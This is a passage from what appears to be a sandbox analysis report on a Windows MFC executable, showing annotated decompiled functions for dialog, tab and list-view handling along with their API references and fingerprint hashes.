    				 *(_t30 - 0x10) =  *(_t30 - 0x10) & 0x00000000;
    				_push( *((intOrPtr*)(_t30 + 0xc)));
    				_push(_t30 + 0xc);
    				_t18 = E0040FEA7();                             // reads a window's text into a CString (IsWindow, WM_GETTEXTLENGTH 0x0E, WM_GETTEXT 0x0D; see subcall APIs)
    				_t28 = 1;
    				_push(0x453480);
    				 *(_t30 - 4) = _t28;                            // EH state 1 while the temporary CString is live
    				L0043DFD6();                                    // MFC42 #2764(0x453480)
    				_push(_t18);
    				_push( *((intOrPtr*)(_t30 + 8)));
    				L0043DFD0();                                    // MFC42 #4129(arg0, CString)
    				 *(_t30 - 0x10) = _t28;
    				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;       // EH state 0
    				L0043DD36();                                    // MFC42 #800: CString destructor for the temporary
    				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));       // unregister the exception frame
    				return  *((intOrPtr*)(_t30 + 8));
    			}

    Statement addresses: 0x004090a8 0x004090ae 0x004090b3 0x004090b9 0x004090ba 0x004090c6 0x004090c7 0x004090cc 0x004090cf 0x004090d4 0x004090d8 0x004090db 0x004090e0 0x004090e3 0x004090ea 0x004090f6 0x004090fe

    APIs
    • __EH_prolog.LIBCMT ref: 004090A8
      • Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
      • Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
      • Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
      • Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
      • Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
      • Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
      • Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
      • Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38
    • #2764.MFC42(00453480), ref: 004090CF
    • #4129.MFC42(?,00000000,00453480), ref: 004090DB
    • #800.MFC42(?,00000000,00453480), ref: 004090EA
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800H_prologMessageSend$#2764#4129#535#537#823#825Windowmemset
    • String ID:
    • API String ID: 2193304076-0
    • Opcode ID: 2eb937e2106b350fa2831798c2fbacd6a7e061da3da283dfba564bfa428832de
    • Instruction ID: 8a6cc1eb11a7df0f8281dd5e51cc0731eacc3b518e9305bdaf75eb62320b9e86
    • Opcode Fuzzy Hash: 2eb937e2106b350fa2831798c2fbacd6a7e061da3da283dfba564bfa428832de
    • Instruction Fuzzy Hash: 54F03A32800118BBCB15EF51D846BDE7B64EF18368F10C01FF4265A181DBBCA708CB98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E0040A916(void* __ecx) {                            // same body as E004090A3 above, with its own unwind handler table
    				void* _t18;
    				signed int _t28;
    				void* _t30;
    
    				E0043E4E0(0x43fb27, _t30);                      // __EH_prolog
    				 *(_t30 - 0x10) =  *(_t30 - 0x10) & 0x00000000;
    				_push( *((intOrPtr*)(_t30 + 0xc)));
    				_push(_t30 + 0xc);
    				_t18 = E0040FEA7();                             // window text -> CString (IsWindow, WM_GETTEXTLENGTH, WM_GETTEXT; see subcall APIs)
    				_t28 = 1;
    				_push(0x453480);
    				 *(_t30 - 4) = _t28;                            // EH state 1 while the temporary CString is live
    				L0043DFD6();                                    // MFC42 #2764(0x453480)
    				_push(_t18);
    				_push( *((intOrPtr*)(_t30 + 8)));
    				L0043DFD0();                                    // MFC42 #4129(arg0, CString)
    				 *(_t30 - 0x10) = _t28;
    				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;       // EH state 0
    				L0043DD36();                                    // MFC42 #800: CString destructor
    				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));       // unregister the exception frame
    				return  *((intOrPtr*)(_t30 + 8));
    			}

    Statement addresses: 0x0040a91b 0x0040a921 0x0040a926 0x0040a92c 0x0040a92d 0x0040a939 0x0040a93a 0x0040a93f 0x0040a942 0x0040a947 0x0040a94b 0x0040a94e 0x0040a953 0x0040a956 0x0040a95d 0x0040a969 0x0040a971

    APIs
    • __EH_prolog.LIBCMT ref: 0040A91B
      • Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
      • Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
      • Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
      • Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
      • Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
      • Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
      • Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
      • Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38
    • #2764.MFC42(00453480), ref: 0040A942
    • #4129.MFC42(?,00000000,00453480), ref: 0040A94E
    • #800.MFC42(?,00000000,00453480), ref: 0040A95D
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800H_prologMessageSend$#2764#4129#535#537#823#825Windowmemset
    • String ID:
    • API String ID: 2193304076-0
    • Opcode ID: cb63854d36014b6e877932daa48041b5da816602cb4eec392a5e3ee97fcfa9d6
    • Instruction ID: d64bdd0405a036fbd0413399d0c1a67b28c89d48611757bf7802f6af712cb830
    • Opcode Fuzzy Hash: cb63854d36014b6e877932daa48041b5da816602cb4eec392a5e3ee97fcfa9d6
    • Instruction Fuzzy Hash: 30F01772800118BBCB15EF51D852BDEBB64EB18368F10C01FF4265A181DBB8A708CB98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E00419A69(void* __ecx, void* __eflags) {
    				void* __esi;
    				void* _t9;
    				intOrPtr* _t11;
    				void* _t24;
    
    				_t9 = E0043E4E0(0x441180, _t24);                // __EH_prolog
    				_push(__ecx);
    				_t11 = E0042549E(L004044C9(_t9, __ecx, __ecx)); // E0042549E wraps ShellExecuteA(NULL, "open", <target>, "nopass", NULL, 0) (see subcall APIs)
    				if(_t11 == 0) {                                 // wrapper returned 0
    					_t11 = E00429029(_t24 - 0x10, 0xe05e);  // builds a CString from string resource 0xE05E (LoadStringA; see subcall APIs)
    					_push( *_t11);                          // its buffer pointer
    					 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;   // EH state 0: the CString is live
    					_push(0x426);                           // dialog control ID 0x426
    					L0043E066();                            // MFC42 #3092(0x426)
    					L0043E15C();                            // MFC42 #6199(<result of #3092>, string)
    					 *(_t24 - 4) =  *(_t24 - 4) | 0xffffffff;   // EH state -1
    					L0043DD36();                            // MFC42 #800: CString destructor
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t24 - 0xc));       // unregister the exception frame
    				return _t11;
    			}

    Statement addresses: 0x00419a6e 0x00419a73 0x00419a7e 0x00419a85 0x00419a90 0x00419a97 0x00419a99 0x00419a9f 0x00419aa4 0x00419aab 0x00419ab0 0x00419ab7 0x00419ab7 0x00419ac0 0x00419ac8

    APIs
    • __EH_prolog.LIBCMT ref: 00419A6E
      • Part of subcall function 0042549E: ShellExecuteA.SHELL32(00000000,open,?,nopass,00000000,00000000), ref: 004254E4
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • #3092.MFC42(00000426,00000000), ref: 00419AA4
    • #6199.MFC42(00000426,00000000), ref: 00419AAB
    • #800.MFC42(00000426,00000000), ref: 00419AB7
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #1168#3092#537#6199#800ExecuteH_prologLoadShellString
    • String ID:
    • API String ID: 132703629-0
    • Opcode ID: ba877fc7b92c41110e75990f08bb3aa5e32a1ea0fcab05b6778409d64a943c06
    • Instruction ID: 61752d821d52279d2cad19324f45f553d17a3c29e92bb3d57704705d5707f77d
    • Opcode Fuzzy Hash: ba877fc7b92c41110e75990f08bb3aa5e32a1ea0fcab05b6778409d64a943c06
    • Instruction Fuzzy Hash: 03F05E31A10214ABDB28A7E2E916BAE7264DB48768F00491FE112A71C1EBBC9D008618
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 66%
    			E0041ACB4(void* __ecx) {
    				intOrPtr* _v0;
    				long _t8;
    				intOrPtr* _t9;
    
    				_t8 = SendMessageA( *(__ecx + 0x88), 0x130b, 0, 0);   // 0x130B = TCM_GETCURSEL: index of the selected tab in the tab control at this+0x88
    				if(_t8 == 0) {                                        // first tab
    					_push(0);
    					L0043E0AE();                                  // MFC42 #6215(0)
    					_push(5);
    					goto L4;
    				} else {
    					if(_t8 == 1) {                                // second tab
    						_push(0);
    						L0043E0AE();                          // MFC42 #6215(0)
    						_push(5);
    						L4:
    						L0043E0AE();                          // MFC42 #6215(5); the 0/5 pair matches SW_HIDE/SW_SHOW if #6215 is CWnd::ShowWindow, which the report does not resolve
    					}
    				}
    				_t9 = _v0;
    				 *_t9 = 0;                                            // *pResult = 0, the epilogue of an MFC notification handler (_v0 is the decompiler's name for that stack argument)
    				return _t9;
    			}

    Statement addresses: 0x0041accd 0x0041accf 0x0041acea 0x0041acf1 0x0041acf6 0x00000000 0x0041acd1 0x0041acd2 0x0041acd4 0x0041acdb 0x0041ace0 0x0041acfe 0x0041acfe 0x0041acfe 0x0041acd2 0x0041ad03 0x0041ad07 0x0041ad0b

    APIs
    • SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 0041ACC7
    • #6215.MFC42(00000000), ref: 0041ACDB
    • #6215.MFC42(00000000), ref: 0041ACF1
    • #6215.MFC42(00000005,00000000), ref: 0041ACFE
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #6215$MessageSend
    • String ID:
    • API String ID: 3418523427-0
    • Opcode ID: 079d5be2641290db3e97d07e7a9972f625c2ae7487483847405e0a0fd588a0b8
    • Instruction ID: 08938adbb38db4e61d98dbfb50fc26a15a681cfca6e00ad597d577aab992f928
    • Opcode Fuzzy Hash: 079d5be2641290db3e97d07e7a9972f625c2ae7487483847405e0a0fd588a0b8
    • Instruction Fuzzy Hash: A4F02031201B046FC234EB2ADD11FD3B7F4EBD2B11F01441EB08A820949EA0298ACB26
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0041C073(intOrPtr __ecx, void* __eflags) {        // destructor shape: the EH state counts down as each member is torn down, then the base class runs
    				void* __esi;
    				void* _t17;
    				void* _t18;
    				void* _t20;
    				intOrPtr _t30;
    				void* _t32;
    
    				_t17 = E0043E4E0(0x44165d, _t32);               // __EH_prolog
    				_push(__ecx);
    				_t30 = __ecx;
    				 *((intOrPtr*)(_t32 - 0x10)) = __ecx;           // this, saved for the unwinder
    				 *(_t32 - 4) = 4;
    				_t18 = L00404F36(_t17, __ecx + 0x12c, __ecx);   // member object at this+0x12C
    				 *(_t32 - 4) = 3;
    				L00404F36(_t18, _t30 + 0xd8, _t30);             // member object at this+0xD8
    				 *(_t32 - 4) = 2;
    				L0043DD36();                                    // MFC42 #800: CString destructor
    				 *(_t32 - 4) = 1;
    				L0043DD36();                                    // MFC42 #800: CString destructor
    				 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
    				_t20 = E0040E116(_t30 + 0x60);                  // member object at this+0x60 (its body runs #2414, #800 and #795; see subcall APIs)
    				 *(_t32 - 4) =  *(_t32 - 4) | 0xffffffff;       // EH state -1: nothing left to unwind
    				L0043E04E();                                    // MFC42 #641 on this
    				 *[fs:0x0] =  *((intOrPtr*)(_t32 - 0xc));       // unregister the exception frame
    				return _t20;
    			}

    Statement addresses: 0x0041c078 0x0041c07d 0x0041c07f 0x0041c081 0x0041c08a 0x0041c091 0x0041c09c 0x0041c0a0 0x0041c0ab 0x0041c0af 0x0041c0ba 0x0041c0be 0x0041c0c3 0x0041c0ca 0x0041c0cf 0x0041c0d5 0x0041c0de 0x0041c0e6

    APIs
    • __EH_prolog.LIBCMT ref: 0041C078
    • #800.MFC42(?,?,0041C05F), ref: 0041C0AF
    • #800.MFC42(?,?,0041C05F), ref: 0041C0BE
      • Part of subcall function 0040E116: __EH_prolog.LIBCMT ref: 0040E11B
      • Part of subcall function 0040E116: #2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E147
      • Part of subcall function 0040E116: #2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E158
      • Part of subcall function 0040E116: #2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E169
      • Part of subcall function 0040E116: #800.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E175
      • Part of subcall function 0040E116: #2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E18A
      • Part of subcall function 0040E116: #2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E1A5
      • Part of subcall function 0040E116: #2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E1BB
      • Part of subcall function 0040E116: #800.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E1CC
      • Part of subcall function 0040E116: #795.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E1D7
    • #641.MFC42(?,?,0041C05F), ref: 0041C0D5
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2414$#800$H_prolog$#641#795
    • String ID:
    • API String ID: 1560397226-0
    • Opcode ID: 2bc6a483f3c54e37fc5829869e7dd38312900a4a557679aac73096920e0ce77d
    • Instruction ID: 99b1f9a0f645c1d20bd82dc7456033321e4b19a352ea70cbd05e69828fe60b05
    • Opcode Fuzzy Hash: 2bc6a483f3c54e37fc5829869e7dd38312900a4a557679aac73096920e0ce77d
    • Instruction Fuzzy Hash: DDF0C270801695DAD725EBA5C1127DCFBB0AF19308F00468EE056632C2CBBC2B04CB65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 22%
    			E0040EA1F(void* __ecx, intOrPtr _a4) {              // shape of an MFC DoDataExchange(CDataExchange* pDX): every call takes (pDX, control ID, member)
    				void* _t4;
    				intOrPtr _t5;
    				intOrPtr* _t7;
    
    				_t5 = _a4;                                      // pDX
    				_t4 = __ecx + 0x228;                            // member at this+0x228
    				_push(_t4);
    				_push(0x479);                                   // control ID 0x479
    				_push(_t5);
    				L0043DF7C();                                    // MFC42 #2302(pDX, 0x479, this+0x228)
    				_t7 = __ecx + 0x268;                            // member at this+0x268
    				_push(_t7);
    				_push(0x42d);                                   // control ID 0x42D
    				_push(_t5);
    				L0043E084();                                    // MFC42 #2363(pDX, 0x42D, this+0x268)
    				_push(0x270f);                                  // 9999
    				_push(1);
    				_push( *_t7);                                   // current value of the member at this+0x268
    				_push(_t5);
    				L0043E258();                                    // MFC42 #2297(pDX, value, 1, 9999)
    				_push(__ecx + 0x68);                            // member at this+0x68
    				_push(0x5360);                                  // control ID 0x5360
    				_push(_t5);
    				L0043DF7C();                                    // MFC42 #2302(pDX, 0x5360, this+0x68)
    				return _t4;
    			}

    Statement addresses: 0x0040ea20 0x0040ea28 0x0040ea2e 0x0040ea2f 0x0040ea34 0x0040ea35 0x0040ea3a 0x0040ea40 0x0040ea41 0x0040ea46 0x0040ea47 0x0040ea4c 0x0040ea51 0x0040ea53 0x0040ea55 0x0040ea56 0x0040ea5e 0x0040ea5f 0x0040ea64 0x0040ea65 0x0040ea6d

    APIs
    • #2302.MFC42(?,00000479,?), ref: 0040EA35
    • #2363.MFC42(?,0000042D,?,?,00000479,?), ref: 0040EA47
    • #2297.MFC42(?,?,00000001,0000270F,?,0000042D,?,?,00000479,?), ref: 0040EA56
    • #2302.MFC42(?,00005360,?,?,?,00000001,0000270F,?,0000042D,?,?,00000479,?), ref: 0040EA65
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2302$#2297#2363
    • String ID:
    • API String ID: 597119315-0
    • Opcode ID: 27ad6c7944b5bfc154fb365c62b5ce0f969e24aa8315b1577fc0499fea43e056
    • Instruction ID: ea08e793f1d993dd3ef116a24dd6f5d6beddd1dc992f25bdafc2d8108c191232
    • Opcode Fuzzy Hash: 27ad6c7944b5bfc154fb365c62b5ce0f969e24aa8315b1577fc0499fea43e056
    • Instruction Fuzzy Hash: C1E0D8F374131076D1206166ACC6EC7A25C9F8C750F00651BB706650D286E46440C6B4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E0040ED90(void* __ecx, intOrPtr _a4, signed int* _a8) {   // shape of an MFC ON_NOTIFY handler: _a4 = NMHDR*, _a8 = LRESULT* pResult
    				signed int* _t8;
    				intOrPtr _t14;
    				void* _t16;
    
    				_t14 = _a4;
    				_t16 = __ecx;
    				if( *((short*)(_t14 + 0xc)) == 0x2e) {          // NMLVKEYDOWN.wVKey (offset 0xC, right after the 12-byte NMHDR) == VK_DELETE
    					E0040ED20(__ecx);                       // removes the selected item and refreshes (LVM_GETNEXTITEM, LVM_DELETEITEM, LVM_GETITEMCOUNT, BM_CLICK; see subcall APIs)
    				}
    				if( *((short*)(_t14 + 0xc)) == 0x71) {          // wVKey == VK_F2
    					L0043DF9A();                            // MFC42 #5981
    					// inner call: LVM_GETNEXTITEM (0x100C), iStart -1, LVNI_SELECTED (2) -> index of the selected item of the list view at this+0x248
    					// outer call: LVM_EDITLABELA (0x1017) on that index -> start in-place label editing
    					_push(SendMessageA( *(_t16 + 0x248), 0x1017, SendMessageA( *(_t16 + 0x248), 0x100c, 0xffffffff, 2), 0));
    					L0043DD9C();                            // MFC42 #2864(<edit control HWND>)
    				}
    				_t8 = _a8;
    				 *_t8 =  *_t8 & 0x00000000;                     // *pResult = 0
    				return _t8;
    			}

    Statement addresses: 0x0040ed92 0x0040ed96 0x0040ed9d 0x0040ed9f 0x0040ed9f 0x0040eda9 0x0040edb1 0x0040eddd 0x0040edde 0x0040edde 0x0040ede3 0x0040ede9 0x0040edec

    APIs
    • #5981.MFC42 ref: 0040EDB1
    • SendMessageA.USER32(?,0000100C,000000FF,00000002), ref: 0040EDCB
    • SendMessageA.USER32(?,00001017,00000000,00000000), ref: 0040EDDB
    • #2864.MFC42(00000000), ref: 0040EDDE
      • Part of subcall function 0040ED20: SendMessageA.USER32(?,0000100C,000000FF,00000002), ref: 0040ED3B
      • Part of subcall function 0040ED20: SendMessageA.USER32(?,00001008,00000000,00000000), ref: 0040ED51
      • Part of subcall function 0040ED20: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040ED60
      • Part of subcall function 0040ED20: #4055.MFC42(00000421), ref: 0040ED6E
      • Part of subcall function 0040ED20: #3092.MFC42(00000421,00000421), ref: 0040ED7A
      • Part of subcall function 0040ED20: SendMessageA.USER32(?,000000F5,00000000,00000000), ref: 0040ED89
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
